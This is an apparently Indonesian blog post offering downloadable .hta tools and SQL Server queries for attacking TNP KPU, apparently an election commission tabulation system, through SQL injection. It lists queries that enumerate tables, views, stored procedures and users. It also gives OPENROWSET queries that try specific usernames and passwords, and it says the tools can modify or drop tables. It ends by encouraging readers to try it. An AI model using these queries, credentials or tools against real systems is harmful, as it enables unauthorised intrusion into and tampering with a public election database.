Untuk mendownload tools Query sederhana:
http://tnpkpu.europe.webmatrixhosting.net/download/CSPHJRM5NV2GSJSD.zip
Untuk mendownload tools SQL Command:
http://tnpkpu.europe.webmatrixhosting.net/download/H4KDIF6T7NTJIFDQ.zip
Kedua tools ini memiliki ekstensi .hta yang merupakan HTML application. Cara menggunakannya:
- pastikan komputer anda terkoneksi ke internet,
- buka filenya dengan dobel-klik,
- ketik syntax SQL-nya pada kotak yang tersedia,
- klik "Execute Query" dan tunggu hingga proses selesai.
Untuk melihat list table:
SELECT [name] FROM sysobjects WHERE [type]='U' or [type]='S'
Untuk melihat disain table:
SELECT A.[colorder], A.[name], C.[name], A.[length],
A.[xprec], A.[xscale] FROM syscolumns A INNER JOIN sysobjects
B ON A.id=B.id INNER JOIN systypes C ON A.xtype=C.xtype WHERE
B.[name]='partai'
Untuk melihat list view:
SELECT [name] FROM sysobjects WHERE [type]='V'
Untuk melihat disain view:
SELECT A.[name], B.[text] FROM sysobjects A INNER JOIN
syscomments B ON A.id=B.id WHERE A.[type]='V'
Untuk melihat list stored procedure:
SELECT [name] FROM sysobjects WHERE [type]='P'
Untuk melihat disain stored procedure:
SELECT A.[name], B.[text] FROM sysobjects A INNER JOIN
syscomments B ON A.id=B.id WHERE A.[type]='P'
Untuk melihat list user:
SELECT [name], [hasdbaccess], [islogin], [isntname],
[isntgroup], [isntuser], [issqluser], issqlrole FROM sysusers
Untuk mencocokan/mencoba-coba user id dan password:
SELECT uid FROM OPENROWSET('SQLOLEDB','TNP';'sa';'tnp','SELECT
user_name() as uid')
SELECT uid FROM
OPENROWSET('SQLOLEDB','TNP';'reportmaker02';'reportmaker','SELECT
user_name() as uid')
Sementara untuk perintah
CREATE TABLE, INSERT, UPDATE, DELETE,
DROP TABLE dapat menggunakan tools SQL command. Cara penggunaannya dapat dilihat dari contoh yang diberikan pada tools tersebut.
Dengan tools ini kita dapat mempelajari serangan SQL Injection pada TNP KPU. Tools ini dapat diedit dengan notepad bila Anda ingin memodifikasi source code-nya.
Selamat mencoba.
0 komentar:
Posting Komentar